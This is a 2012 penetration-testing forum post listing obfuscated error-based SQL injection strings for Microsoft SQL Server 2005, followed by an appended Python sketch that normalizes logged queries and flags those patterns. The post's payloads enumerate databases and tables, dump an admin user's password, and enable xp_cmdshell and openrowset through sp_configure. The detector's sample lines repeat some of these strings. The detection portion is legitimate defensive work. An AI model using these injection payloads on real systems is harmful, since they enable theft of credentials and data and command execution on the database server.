China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: MSsql2005 injection statements
Author: admin
Time: 2012-9-13 17:19

CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

Table enumeration statement. The somedb part is the database to be listed; increment the red number 1.

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

Column dump statement: dumps the password field for user='icerover' in table admin.

CODE:
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

MSSQL 2005 does not have xp_cmdshell enabled by default, and openrowset cannot be used either.
With sa privileges, they can be enabled as follows.

Enable openrowset

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

Enable xp_cmdshell

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

OK, that's all~~ good night
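
Added example (not part of the original post): a detection sketch that normalizes a logged query string by undoing the /**/ spacing, the %2b/%3d encoding and the bracket quoting seen in the statements above, then matches keyword rules. The rule names, the "id" parameter and the sample lines are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are illustrative; the keywords come from the statements in the post.
RULES = {
    "catalog-enumeration": re.compile(r"\b(sysdatabases|sys\.all_objects)\b"),
    "error-based-cast": re.compile(r"\band \(select top \d+ .*\bcast\("),
    "sp_configure-change": re.compile(r"\bsp_configure\b.*\breconfigure\b"),
    "adhoc-distributed-queries": re.compile(r"\bad hoc distributed queries\b"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
}
_INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(raw_query: str) -> str:
    """Undo the obfuscation used in the post so keyword rules can match."""
    text = unquote_plus(raw_query)            # %2b -> '+', %3d -> '='
    text = _INLINE_COMMENT.sub(" ", text)     # /**/ used in place of spaces
    text = text.replace("[", "").replace("]", "")  # [master].[dbo] -> master.dbo
    return re.sub(r"\s+", " ", text).strip().lower()


def classify(raw_query: str) -> list:
    """Return the sorted names of every rule the normalized query matches."""
    norm = normalize(raw_query)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))


# Constructed sample query strings (parameter name "id" is an assumption);
# the SQL fragments are abbreviated from the statements in the post.
SAMPLES = [
    "id=42&name=Cast+Iron+Pan",
    "id=1/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))"
    "/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85))%3d0--",
    "id=1;/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--",
    "id=1;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or "clean", "<-", line[:60])
```

The normalizer decodes only one layer of URL encoding; double-encoded input needs a second pass before the rules are applied.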